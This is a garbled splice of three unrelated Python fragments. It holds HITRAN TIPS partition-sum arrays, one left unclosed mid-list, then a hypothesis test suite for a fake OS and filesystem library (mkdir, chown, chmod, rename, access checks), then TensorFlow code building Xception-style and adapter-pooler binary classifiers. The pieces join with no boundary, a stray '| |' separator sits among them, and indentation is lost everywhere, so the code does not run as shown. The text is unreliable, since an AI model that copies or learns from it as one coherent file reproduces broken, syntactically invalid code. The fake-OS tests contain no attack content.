5.732781E+04, 5.762331E+04, 5.791962E+04, 5.821674E+04, 5.851467E+04, 5.881341E+04,
5.911295E+04, 5.941331E+04, 5.971447E+04, 6.001644E+04, 6.031922E+04, 6.062281E+04,
6.092721E+04, 6.123242E+04, 6.153844E+04, 6.184527E+04, 6.215291E+04, 6.246136E+04,
6.277062E+04, 6.308069E+04, 6.339157E+04, 6.370326E+04, 6.401576E+04, 6.432907E+04,
6.464320E+04, 6.495813E+04, 6.527387E+04, 6.559043E+04, 6.590779E+04, 6.622597E+04,
6.654496E+04, 6.686476E+04, 6.718537E+04, 6.750679E+04, 6.782902E+04, 6.815206E+04,
6.847592E+04, 6.880058E+04, 6.912606E+04, 6.945235E+04, 6.977945E+04, 7.010736E+04,
7.043609E+04, 7.076562E+04, 7.109597E+04, 7.142713E+04, 7.175910E+04, 7.209188E+04,
7.242547E+04, 7.275988E+04, 7.309509E+04, 7.343112E+04, 7.376796E+04, 7.410561E+04,
7.444407E+04, 7.478335E+04, 7.512343E+04, 7.546433E+04, 7.580603E+04, 7.614855E+04,
7.649188E+04, 7.683602E+04, 7.718098E+04, 7.752674E+04, 7.787331E+04, 7.822070E+04,
7.856889E+04, 7.891790E+04, 7.926772E+04, 7.961835E+04, 7.996979E+04, 8.032204E+04,
8.067510E+04, 8.102897E+04, 8.138365E+04, 8.173914E+04, 8.209544E+04, 8.245255E+04,
8.281047E+04, 8.316920E+04, 8.352874E+04, 8.388909E+04, 8.425025E+04, 8.461221E+04,
8.497499E+04,
])
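# Both hashes are keyed by (M, I) = (HITRAN molecule number, isotopologue
# number): TIPS_2017_ISOT_HASH[(M, I)] holds the temperature grid and
# TIPS_2017_ISOQ_HASH[(M, I)] the total internal partition sums tabulated on
# that grid.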
# ---------------------- M = 6, I = 1 ---------------------------
M = 6
I = 1
TIPS_2017_ISOT_HASH[(M,I)] = TIPS_2017_ISOT[2]
TIPS_2017_ISOQ_HASH[(M,I)] = float64([
5.000000E+00, 1.273695E+01, 3.049472E+01, 5.478766E+01, 8.367753E+01, 1.164151E+02,
1.525835E+02, 1.918873E+02, 2.341011E+02, 2.790524E+02, 3.266165E+02, 3.767179E+02,
4.293326E+02, 4.844902E+02, 5.422734E+02, 6.028155E+02, 6.662963E+02, 7.329384E+02,
8.030016E+02, 8.767796E+02, 9.545964E+02, 1.036804E+03, 1.123780E+03, 1.215929E+03,
1.313679E+03, 1.417485E+03, 1.527828E+03, 1.645218E+03, 1.770193E+03, 1.903324E+03,
2.045215E+03, 2.196504E+03, 2.357871E+03, 2.530032E+03, 2.713751E+03, 2.909836E+03,
3.119144E+03, 3.342585E+03, 3.581125E+03, 3.835788E+03, 4.107662E+03, 4.397900E+03,
4.707726E+03, 5.038440E+03, 5.391417E+03, 5.768118E+03, 6.170091E+03, 6.598978E+03,
7.056516E+03, 7.544548E+03, 8.065026E+03, 8.620015E+03, 9.211704E+03, 9.842405E+03,
1.051457E+04, 1.123079E+04, 1.199379E+04, 1.280649E+04, 1.367192E+04, 1.459334E+04,
1.557414E+04, 1.661792E+04, 1.772850E+04, 1.890986E+04, 2.016624E+04, 2.150208E+04,
2.292207E+04, 2.443115E+04, 2.603450E+04, 2.773758E+04, 2.954614E+04, 3.150651E+04,
3.355181E+04, 3.572292E+04, 3.802703E+04, 4.047168E+04, 4.306485E+04, 4.581488E+04,
4.873055E+04, 5.182111E+04, 5.509623E+04, 5.856610E+04, 6.224140E+04, 6.613336E+04,
7.025373E+04, 7.461487E+04, 7.922970E+04, 8.411182E+04, 8.927543E+04, 9.473544E+04,
1.005075E+05, 1.066079E+05, 1.130538E+05, 1.198631E+05, 1.270545E+05, 1.346478E+05,
1.426634E+05, 1.511227E+05, 1.600483E+05, 1.694635E+05, 1.793929E+05, 1.898620E+05,
2.008977E+05, 2.125277E+05, 2.247814E+05, 2.376890E+05, 2.512823E+05, 2.655945E+05,
2.806600E+05, 2.965148E+05, 3.131965E+05, 3.307442E+05, 3.491987E+05, 3.686022E+05,
3.889992E+05, 4.104356E+05, 4.329593E+05, 4.566203E+05, 4.814703E+05, 5.075634E+05,
5.349557E+05, 5.637057E+05, 5.938740E+05, 6.255236E+05, 6.587202E+05, 6.935319E+05,
7.300294E+05, 7.682862E+05, 8.083785E+05, 8.503856E+05, 8.943897E+05, 9.404760E+05,
9.887330E+05, 1.039252E+06, 1.092129E+06, 1.147463E+06, 1.205355E+06, 1.265911E+06,
1.329242E+06, 1.395461E+06, 1.464686E+06, 1.537038E+06, 1.612646E+06, 1.691638E+06,
1.774151E+06, 1.860324E+06, 1.950303E+06, 2.044237E+06, 2.142281E+06, 2.244596E+06,
2.351347E+06, 2.462706E+06, 2.578850E+06, 2.699960E+06, 2.826228E+06, 2.957846E+06,
3.095017E+06, 3.237950E+06, 3.386857E+06, 3.541963E+06, 3.703494E+06, 3.871687E+06,
4.046785E+06, 4.229040E+06, 4.418710E+06, 4.616063E+06, 4.821373E+06, 5.034924E+06,
5.257009E+06, 5.487928E+06, 5.727992E+06, 5.977520E+06, 6.236841E+06, 6.506295E+06,
6.786230E+06, 7.077006E+06,
])
# ---------------------- M = 6, I = 2 ---------------------------
M = 6
I = 2
TIPS_2017_ISOT_HASH[(M,I)] = TIPS_2017_ISOT[2]
TIPS_2017_ISOQ_HASH[(M,I)] = float64([
1.000001E+01, 2.547411E+01, 6.098959E+01, 1.095756E+02, 1.673556E+02, 2.328309E+02,
3.051677E+02, 3.837737E+02, 4.682005E+02, 5.581019E+02, 6.532270E+02, 7.534273E+02,
8.586439E+02, 9.689291E+02, 1.084461E+03, 1.205482E+03, 1.332363E+03, 1.465530E+03,
1.605503E+03, 1.752860E+03, 1.908229E+03, 2.072336E+03, 2.245903E+03, 2.429737E+03,
2.624664E+03, 2.831592E+03, 3.051489E+03, 3.285303E+03, 3.534174E+03, 3.799126E+03,
4.081393E+03, 4.382239E+03, 4.702959E+03, 5.044945E+03, 5.409694E+03, 5.798822E+03,
6.213891E+03, 6.656804E+03, 7.129283E+03, 7.633410E+03, 8.171277E+03, 8.745069E+03,
9.357183E+03, 1.001001E+04, 1.070636E+04, 1.144891E+04, 1.224067E+04, 1.308471E+04,
1.398443E+04, 1.494334E+04, 1.596502E+04, 1.705351E+04, 1.821287E+04, 1.944758E+04,
2.076216E+04, 2.216156E+04, 2.365078E+04, 2.523547E+04, 2.692124E+04, 2.871415E+04,
3.062057E+04, 3.264725E+04, 3.480122E+04, 3.708988E+04, 3.952125E+04, 4.210358E+04,
4.484543E+04, 4.775615E+04, 5.084522E+04, 5.412274E+04, 5.759952E+04, 6.128669E+04,
6.519606E+04, 6.933999E+04, 7.373142E+04, 7.838393E+04, 8.331199E+04, 8.853045E+04,
9.405527E+04, 9.990284E+04, 1.060906E+05, 1.126365E+05, 1.195598E+05, 1.268805E+05,
1.346193E+05, 1.427982E+05, 1.514402E+05, 1.605692E+05, 1.702104E+05, 1.803902E+05,
1.911358E+05, 2.024762E+05, 2.144415E+05, 2.270628E+05, 2.403733E+05, 2.544072E+05,
2.692002E+05, 2.847901E+05, 3.012156E+05, 3.185180E+05, 3.367395E+05, 3.559247E+05,
3.761201E+05, 3.973740E+05, 4.197368E+05, 4.432611E+05, 4.680017E+05, 4.940161E+05,
5.213635E+05, 5.501059E+05, 5.803083E+05, 6.120376E+05,
import operator
import os as _os
from pathlib import Path
from string import ascii_letters
from itertools import chain, permutations
from functools import reduce
from fakeos import FakeOS
from hypothesis import given, assume, example
from hypothesis.strategies import text, sets, integers, lists, just
from filesystem import FakeDirectory, FakeFile, FakeFilesystem, \
FakeFilesystemWithPermissions
from fakeuser import FakeUser, Root
from unittest import TestCase
from operating_system import FakeWindows, FakeUnix
ILLEGAL_NAMES = ("", ".", "..")
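# The cases below draw arbitrary names with hypothesis and use assume() to
# discard values that cannot serve as a single path component, e.g.:
#   assume("/" not in directory and directory not in ILLEGAL_NAMES)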
class DirectoryCase(TestCase):
@given(text())
def test_mkdir_when_directory_already_exists(self, directory: str):
assume("/" not in directory and directory not in ILLEGAL_NAMES)
os = FakeOS(
filesystem=FakeFilesystem(directories=[FakeDirectory(Path("/"))]))
os.mkdir("/" + directory)
with self.assertRaises(FileExistsError):
os.mkdir("/" + directory)
@given(text())
def test_mkdir_when_parent_directory_doesnt_exist(self, directory: str):
assume("/" not in directory and directory not in ILLEGAL_NAMES)
os = FakeOS(
filesystem=FakeFilesystem(directories=[FakeDirectory(Path("/"))]))
with self.assertRaises(FileNotFoundError):
os.mkdir("/hello/" + directory)
@given(text(), text())
def test_mkdir_and_directory_exists_afterwards(self, directory: str, _file: str):
assume("/" not in directory and directory not in ILLEGAL_NAMES)
assume("/" not in _file and _file not in ILLEGAL_NAMES)
os = FakeOS(
filesystem=FakeFilesystem(directories=[FakeDirectory(Path("/"))]))
os.mkdir("/" + directory)
os.mkdir("/" + directory + "/" + _file)
assert os.filesystem.has(Path("/" + directory + "/" + _file))
@given(text())
def test_mkdir_works(self, directory):
assume("/" not in directory and directory not in ILLEGAL_NAMES)
os = FakeOS(
filesystem=FakeFilesystem(directories=[FakeDirectory(Path("/"))]))
os.mkdir("/" + directory)
@given(text())
def test_creating_root_directory(self, directory):
assume("/" not in directory and directory not in ILLEGAL_NAMES)
os = FakeOS()
os.mkdir(directory)
assert os.filesystem.has_directory(Path(directory))
@given(text(), sets(text()))
@example("0", set())
def test_listdir_with_subdirectories_only(self, directory, subdirectories):
assume("/" not in directory and directory not in ILLEGAL_NAMES)
for subdirectory in subdirectories:
assume(subdirectory not in ILLEGAL_NAMES)
assume("/" not in subdirectory)
os = FakeOS(
filesystem=FakeFilesystem(directories=[FakeDirectory(Path("/"))]))
os.mkdir("/" + directory)
for subdirectory in subdirectories:
os.mkdir("/" + directory + "/" + subdirectory)
assert sorted(subdirectories) == sorted(os.listdir("/" + directory))
@given(text())
def test_listdir_empty_directory(self, directory):
assume("/" not in directory and directory not in ILLEGAL_NAMES)
os = FakeOS(
filesystem=FakeFilesystem(directories=[FakeDirectory(Path("/"))]))
os.mkdir("/" + directory)
assert os.listdir("/" + directory) == []
@given(text(), text())
def test_listdir_with_a_file_inside(self, directory, filename):
assume("/" not in directory and directory not in ILLEGAL_NAMES)
assume("/" not in filename and filename not in ILLEGAL_NAMES)
os = FakeOS(
filesystem=FakeFilesystem(directories=[FakeDirectory(Path("/"))],
files=[FakeFile(Path("/" +
directory +
"/" +
filename))]
))
os.mkdir("/" + directory)
assert os.listdir("/" + directory) == [filename]
@given(text(), text(), text())
def test_listdir_with_a_file_and_a_directory_inside(self, directory,
filename, subdirectory):
assume(subdirectory != filename)
assume("/" not in directory and directory not in ILLEGAL_NAMES)
assume("/" not in filename and filename not in ILLEGAL_NAMES)
assume("/" not in subdirectory and subdirectory not in ILLEGAL_NAMES)
os = FakeOS(
filesystem=FakeFilesystem(directories=[FakeDirectory(Path("/"))],
files=[FakeFile(Path("/" +
directory +
"/" +
filename))]
))
os.mkdir("/" + directory)
os.mkdir("/" + directory + "/" + subdirectory)
assert sorted(os.listdir("/" + directory)) == sorted([filename, subdirectory])
@given(text())
def test_makedirs_one_file_path(self, path):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS(
filesystem=FakeFilesystem(directories=[FakeDirectory(Path(path))]))
with self.assertRaises(OSError):
os.makedirs(path)
try:
os.makedirs(path, exist_ok=True)
except OSError:
self.fail()
@given(text())
@example("/")
@example("/0")
def test_makedirs_multiple_file_path(self, path: str):
assume("/" in path and not path.startswith("."))
os = FakeOS()
os.makedirs(path)
with self.assertRaises(OSError):
os.makedirs(path)
@given(text())
def test_makedirs_when_part_of_the_path_exists_and_is_a_file(self, path: str):
assume("/" in path)
os = FakeOS(filesystem=FakeFilesystem(files=[FakeFile(Path(path))]))
dirname = Path(path).joinpath("dirname")
with self.assertRaises(FileExistsError):
os.makedirs(dirname)
@given(text())
@example("0")
def test_rmdir(self, path):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS()
fullpath = "/" + path
os.makedirs(fullpath)
assert path in os.listdir("/")
os.rmdir(fullpath)
assert path not in os.listdir("/")
with self.assertRaises(FileNotFoundError):
os.rmdir(fullpath)
os.makedirs(fullpath + "/hello")
with self.assertRaises(OSError):
os.rmdir(fullpath)
os = FakeOS(filesystem=FakeFilesystemWithPermissions(FakeFilesystem(
files=[FakeFile(Path(path))])))
with self.assertRaises(NotADirectoryError):
os.rmdir(path)
class ChownCase(TestCase):
@given(text(), integers(), integers())
def test_chown_to_a_directory(self, path: str, uid: int, gid: int):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS()
os.mkdir(path)
os.chown(path, uid=uid, gid=gid)
assert os.filesystem[path].uid == uid
assert os.filesystem[path].gid == gid
@given(text(), integers(), integers())
def test_chown_to_a_file(self, path: str, uid: int, gid: int):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS(filesystem=FakeFilesystem(files=[FakeFile(Path(path))]))
os.chown(path, gid=gid, uid=uid)
assert os.filesystem[path].uid == uid
assert os.filesystem[path].gid == gid
@given(text(), integers(), integers())
def test_chown_to_a_nonexisting_fileobject(self, path: str, uid: int,
gid: int):
os = FakeOS()
with self.assertRaises(FileNotFoundError):
os.chown(path, gid=gid, uid=uid)
@given(text(), integers(), integers())
def test_chown_not_changing_already_set_attributes(self, path: str,
uid: int, gid: int):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS()
os.mkdir(path)
os.chown(path, uid=uid, gid=gid)
os.chown(path, uid=-1, gid=-1)
assert os.filesystem[path].gid == gid
assert os.filesystem[path].uid == uid
class ChmodCase(TestCase):
@given(text(), integers())
def test_chmod(self, path, mode):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS()
os.mkdir(path)
os.chmod(path, mode)
assert os.filesystem[path].mode == mode
class FileCase(TestCase):
@given(text())
@example("0")
def test_remove_a_file(self, path):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS(filesystem=FakeFilesystemWithPermissions(FakeFilesystem(
files=[FakeFile(Path("hello/" + path))])))
os.mkdir("hello")
assert os.listdir("hello") == [path]
os.remove("hello/" + path)
assert os.listdir("hello") == []
@given(text())
def test_remove_a_directory(self, path):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS()
os.mkdir(path)
with self.assertRaises(IsADirectoryError):
os.remove(path)
@given(text())
def test_remove_a_non_existent_file(self, path):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS()
with self.assertRaises(FileNotFoundError):
os.remove(path)
class CurrentDirectoryCase(TestCase):
@given(text())
def test_chdir(self, path):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS()
os.mkdir(path)
os.chdir(path)
assert os.getcwd() == str(Path(path).absolute())
@given(text())
def test_chdir_directory_does_not_exist(self, path):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS()
with self.assertRaises(FileNotFoundError):
os.chdir(path)
@given(text())
def test_chdir_directory_path_is_a_file(self, path):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS(filesystem=FakeFilesystem(files=[FakeFile(Path(path))]))
with self.assertRaises(NotADirectoryError):
os.chdir(path)
class DeviceCase(TestCase):
@given(integers(), integers())
def test_makedev(self, major, minor):
assume(-1 < major < 2 ** 31 and -1 < minor < 2 ** 31)
os = FakeOS()
assert os.makedev(major, minor) == _os.makedev(major, minor)
@given(integers())
def test_major(self, device):
assume(-1 < device < 2 ** 64)
os = FakeOS()
assert os.major(device) == _os.major(device)
@given(integers())
def test_minor(self, device):
assume(-1 < device < 2 ** 64)
os = FakeOS()
assert os.minor(device) == _os.minor(device)
class RenameCase(TestCase):
@given(text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1))
def test_renaming_root_directory(self, old, new):
assume(old != new)
os = FakeOS()
os.mkdir(old)
os.rename(old, new)
with self.assertRaises(FileNotFoundError):
old_file = os.filesystem[Path(old)]
try:
new_file = os.filesystem[Path(new)]
except FileNotFoundError:
self.fail("Filke was not renamed.")
@given(text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1))
def test_renaming_non_root_directory(self, root, old, new):
os = FakeOS()
os.mkdir(root)
os.mkdir(root + "/" + old)
os.rename(root + "/" + old, root + "/" + new)
assert os.listdir(root) == [new]
@given(text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1))
def test_renaming_root_non_leaf_folder(self, old, new, inside):
os = FakeOS()
os.mkdir(old)
os.mkdir(old + "/" + inside)
os.rename(old, new)
assert os.listdir(new) == [inside]
@given(text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1))
def test_renaming_non_root_non_leaf_folder(self, old, new, inside, root):
os = FakeOS()
os.makedirs(root + "/" + old + "/" + inside)
os.rename(root + "/" + old, root + "/" + new)
assert os.listdir(root + "/" + new) == [inside]
@given(text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1))
def test_renaming_when_destination_exists_on_windows(self, old, new):
assume(old != new)
os = FakeOS(operating_system=FakeWindows())
os.mkdir(old)
os.mkdir(new)
with self.assertRaises(OSError):
os.rename(old, new)
@given(text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1))
def test_renaming_when_destination_exists_on_unix(self, old, new, somefile):
assume(old != new)
os = FakeOS(operating_system=FakeUnix(),
filesystem=FakeFilesystem(files=[FakeFile(Path(old)),
FakeFile(Path(new))],
operating_system=FakeUnix()))
os.rename(old, new)
os.filesystem[Path(new)]
with self.assertRaises(OSError):
fileobject = os.filesystem[Path(old)]
@given(text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1))
def test_renaming_a_folder_and_changing_its_hierarchy(self, a, b, c, d, e):
assume(e != b)
os = FakeOS()
os.makedirs(a + "/" + b + "/" + c + "/" + d)
os.rename(a + "/" + b + "/" + c, a + "/" + e)
assert set(os.listdir(a)) == {b, e}
assert os.listdir(a + "/" + e) == [d]
@given(text(alphabet=ascii_letters, min_size=1))
def test_renaming_to_the_same_thing(self, path):
os = FakeOS()
os.mkdir(path)
os.rename(path, path)
class AccessCase(TestCase):
def test_access_when_root(self):
os = FakeOS(user=Root())
os.mkdir("/", mode=0o000)
for access_modifier in (os.X_OK, os.W_OK, os.R_OK, os.F_OK):
assert os.access("/", access_modifier)
def test_access_exist(self):
os = FakeOS()
os.mkdir("/")
assert os.access("/", os.F_OK) and not os.access("other", os.F_OK)
def test_access_effective_ids(self):
os = FakeOS(user=FakeUser(gid=-2, uid=-2, is_sudoer=False))
os.setgid(0)
os.setuid(0)
assert os.getgid() == 0
assert os.getuid() == 0
os.mkdir("/", mode=0o070) # Group only
os.setgid(-7)
os.setuid(-7)
os.seteuid(0)
os.setegid(0)
assert not os.access("/", mode=os.R_OK)
assert os.access("/", mode=os.R_OK, effective_ids=True)
def test_access_when_owner(self):
os = FakeOS(user=FakeUser(gid=14, uid=42))
os.mkdir("r", mode=0o400)
os.mkdir("w", mode=0o200)
os.mkdir("x", mode=0o100)
os.mkdir("rw", mode=0o600)
os.mkdir("wx", mode=0o300)
os.mkdir("rx", mode=0o500)
os.mkdir("rwx", mode=0o700)
os.filesystem.set_user(FakeUser(gid=18, uid=42))
assert os.access("r", os.R_OK)
assert not os.access("r", os.W_OK)
assert not os.access("r", os.X_OK)
assert os.access("w", os.W_OK)
assert not os.access("w", os.R_OK)
assert not os.access("w", os.X_OK)
assert os.access("x", os.X_OK)
assert not os.access("x", os.R_OK)
assert not os.access("x", os.W_OK)
assert os.access("rw", os.R_OK)
assert os.access("rw", os.W_OK)
assert os.access("rw", os.R_OK | os.W_OK)
assert not os.access("rw", os.X_OK)
assert not os.access("rw", os.X_OK | os.W_OK)
assert os.access("wx", os.X_OK)
assert os.access("wx", os.W_OK)
assert os.access("wx", os.X_OK | os.W_OK)
assert not os.access("wx", os.R_OK)
assert not os.access("wx", os.X_OK | os.R_OK)
assert os.access("rx", os.X_OK)
assert os.access("rx", os.R_OK)
assert os.access("rx", os.X_OK | os.R_OK)
| |
input_shape (tuple, optional): Shape of the input tensor. Defaults to (1, 1024, 26).
gpu_device (str, optional): If GPU devices are available, defines which one to utilize. Defaults to "/gpu:0".
verbose (bool, optional): Log details to console. Defaults to True.
Returns:
tf.keras.Model: returns a TensorFlow 2.2 model (compiled, untrained)
"""
# Input validation
self.__require_params(input_shape = input_shape)
if (not gpu_device) or self.__GPU_count == 0:
gpu_device = "/cpu:0"
# Model hyperparameters and metadata
model_name = 'Binary Classification Xception'
opt = Adam(learning_rate = 1e-3, beta_1 = 0.9, beta_2 = 0.999, epsilon = 1e-8)
loss = CategoricalCrossentropy(from_logits = True)
metrics = ['accuracy']
# Construct model & compile
with tf.device(gpu_device):
# input image size
input_img = layers.Input(shape = input_shape, dtype = tf.float32)
# Block 1
x = Conv2D(32, (1, 3), strides=(1, 3), use_bias=False) (input_img)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = Conv2D(64, (1, 3), use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
residual = Conv2D(128, (1, 1), strides=(1, 2), padding='same', use_bias=False)(x)
residual = BatchNormalization()(residual)
# Block 2
x = SeparableConv2D(128, (1, 3), padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = SeparableConv2D(128, (1, 3), padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
# Block 2 Pool
x = AveragePooling2D((1, 3), strides=(1, 2), padding='same')(x)
x = layers.add([x, residual])
residual = Conv2D(256, (1, 1), strides=(1, 2), padding='same', use_bias=False)(x)
residual = BatchNormalization()(residual)
# Block 3
x = Activation('relu')(x)
x = SeparableConv2D(256, (1, 3), padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = SeparableConv2D(256, (1, 3), padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
# Block 3 Pool
x = AveragePooling2D((1, 3), strides=(1, 2), padding='same')(x)
x = layers.add([x, residual])
residual = Conv2D(728, (1, 1), strides=(1, 2), padding='same', use_bias=False)(x)
residual = BatchNormalization()(residual)
# Block 4
x = Activation('relu')(x)
x = SeparableConv2D(728, (1, 3), padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = SeparableConv2D(728, (1, 3), padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = AveragePooling2D((1, 3), strides=(1, 2), padding='same')(x)
x = layers.add([x, residual])
# Block 5 - 12
for i in range(8):
residual = x
x = Activation('relu')(x)
x = SeparableConv2D(728, (1, 3), padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = SeparableConv2D(728, (1, 3), padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = SeparableConv2D(728, (1, 3), padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = layers.add([x, residual])
residual = Conv2D(1024, (1, 1), strides=(1, 2), padding='same', use_bias=False)(x)
residual = BatchNormalization()(residual)
# Block 13
x = Activation('relu')(x)
x = SeparableConv2D(728, (1, 3), padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = SeparableConv2D(1024, (1, 3), padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
# Block 13 Pool
x = AveragePooling2D((1, 3), strides=(1, 2), padding='same')(x)
x = layers.add([x, residual])
# Block 14
x = SeparableConv2D(1536, (1, 3), padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
# Block 14 part 2
x = SeparableConv2D(2048, (1, 3), padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
# Fully Connected Layer
x = GlobalAveragePooling2D()(x)
x = layers.Dense(2, dtype = tf.float32, name = 'dense_2_final') (x)
model = models.Model(input_img, x, name = model_name)
model.compile(loss = loss, optimizer = opt, metrics = metrics)
# Print verbose output to console
if verbose:
self.__verbose_print(model, model_name, input_shape, opt, loss, metrics)
return model
#/////////////////////////////////////////////////////
#\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
### Xception (Abbreviated w/ CLS Residual)
#/////////////////////////////////////////////////////
#\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
def get_xception_abbreviated_clsresidual(self, input_shape = (1, 1024, 26), gpu_device = "/gpu:0", verbose = True):
r"""Returns the TensorFlow 2.2 implementation of Xception (Abbreviated w/ CLS Residual).
Inspired by Chollet 2017 : http://arxiv.org/abs/1610.02357
Args:
input_shape (tuple, optional): Shape of the input tensor. Defaults to (1, 1024, 26).
gpu_device (str, optional): If GPU devices are available, defines which one to utilize. Defaults to "/gpu:0".
verbose (bool, optional): Log details to console. Defaults to True.
Returns:
tf.keras.Model: returns a TensorFlow 2.2 model (compiled, untrained)
"""
# Input validation
self.__require_params(input_shape = input_shape)
if (not gpu_device) or self.__GPU_count == 0:
gpu_device = "/cpu:0"
# Model hyperparameters and metadata
model_name = 'Binary Classification Xception (Abbreviated w/ CLS Residual)'
opt = Adam(learning_rate = 1e-3, beta_1 = 0.9, beta_2 = 0.999, epsilon = 1e-8)
loss = CategoricalCrossentropy(from_logits = True)
metrics = ['accuracy']
# Construct model & compile
with tf.device(gpu_device):
# input image size
input_img = layers.Input(shape = input_shape, dtype = tf.float32)
# pull the last channel layer for residual connection layer
inp_seq = input_img[:,:,:,-1]
inp_seq = tf.squeeze(inp_seq, axis = 1)
# Block 1
x = Conv2D(64, (1, 3), strides=(1, 3), use_bias=False) (input_img)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = Conv2D(128, (1, 3), use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
residual = Conv2D(512, (1, 1), strides=(1, 2), padding='same', use_bias=False)(x)
residual = BatchNormalization()(residual)
# Block 2
x = SeparableConv2D(256, (1, 3), padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = SeparableConv2D(512, (1, 3), padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
# Block 2 Pool
x = AveragePooling2D((1, 3), strides=(1, 2), padding='same')(x)
x = layers.add([x, residual])
# Fully Connected Layer
x = GlobalAveragePooling2D()(x)
# add the skip level residual back to the last CLS token
x = layers.concatenate([x, inp_seq])
x = layers.Dense(2, dtype = tf.float32, name = 'dense_2_final') (x)
model = models.Model(input_img, x, name = model_name)
model.compile(loss = loss, optimizer = opt, metrics = metrics)
# Print verbose output to console
if verbose:
self.__verbose_print(model, model_name, input_shape, opt, loss, metrics)
return model
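# Usage sketch (hedged): assuming `m` is an instance of the enclosing model
# factory class, each getter returns a compiled, untrained tf.keras model:
#   model = m.get_xception_abbreviated_clsresidual(input_shape=(1, 1024, 26))
#   model.summary()
# The instance name `m` is hypothetical; the class definition is outside this
# excerpt.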
#/////////////////////////////////////////////////////
#\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
### Adapter Pooler Mean Average
#/////////////////////////////////////////////////////
#\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
def get_adapaterpooling_meanavg(self, input_shape = (1, 1024, 26), gpu_device = "/gpu:0", verbose = True):
r"""Returns the TensorFlow 2.2 implementation of Adapter Pooler Mean Average model.
tensor contraction along the channel dimension perfomed using simple mean averaging.
adapter pooler layer inspired by Houlsby et al. 2019 : https://arxiv.org/abs/1902.00751v2
Args:
input_shape (tuple, optional): Shape of the input tensor. Defaults to (1, 1024, 26).
gpu_device (str, optional): If GPU devices are available, defines which one to utilize. Defaults to "/gpu:0".
verbose (bool, optional): Log details to console. Defaults to True.
Returns:
tf.keras.Model: returns a TensorFlow 2.2 model (compiled, untrained)
"""
# Input validation
self.__require_params(input_shape = input_shape)
if (not gpu_device) or self.__GPU_count == 0:
gpu_device = "/cpu:0"
# Model hyperparameters and metadata
model_name = 'Binary Classification Adapter Pooler Mean Average'
opt = Adam(learning_rate = 1e-3, beta_1 = 0.9, beta_2 = 0.999, epsilon = 1e-8)
loss = CategoricalCrossentropy(from_logits = True)
metrics = ['accuracy']
# Construct model & compile
with tf.device(gpu_device):
inp = layers.Input(input_shape, name = 'input_layer')
inp_seq = inp[:,:,:,-1]
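# Note (assumption): the last channel is taken here to hold the CLS-token
# embedding; inp_seq has shape (batch, 1, 1024) and is concatenated back in
# below as a skip connection around the pooler.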
X = MeanConcat() (inp)
X = tf.expand_dims(X, axis = -1, name ='expand_dims')
X = AdapterPooler(386, shared_weights = True)(X)
X = tf.reshape(X, (-1, X.shape[1], X.shape[2] * X.shape[3]))
X = tf.concat([X, inp_seq], axis = 2)
X = tf.squeeze(X, axis = 1)
X = layers.Dense(2)(X)
model = Model(inputs = inp, outputs = X, name = model_name)
model.compile(loss = loss, optimizer = opt, metrics = metrics)
# Print verbose output to console
if verbose:
self.__verbose_print(model, model_name, input_shape, opt, loss, metrics)
return model
###########################################################################################################
## CLASS CONTAINING SPAN ANNOTATION MODELS
###########################################################################################################
class QnAModels(object):
def __init__(self, **kwargs):
self.__GPU_count = len(tf.config.list_physical_devices('GPU'))
######################################################
### Private Methods
######################################################
# validate required input parameter values aren't set to None
@staticmethod
def __require_params(**kwargs):
needed_args = [key for key,value in kwargs.items() if value is None]
if len(needed_args) > 0:
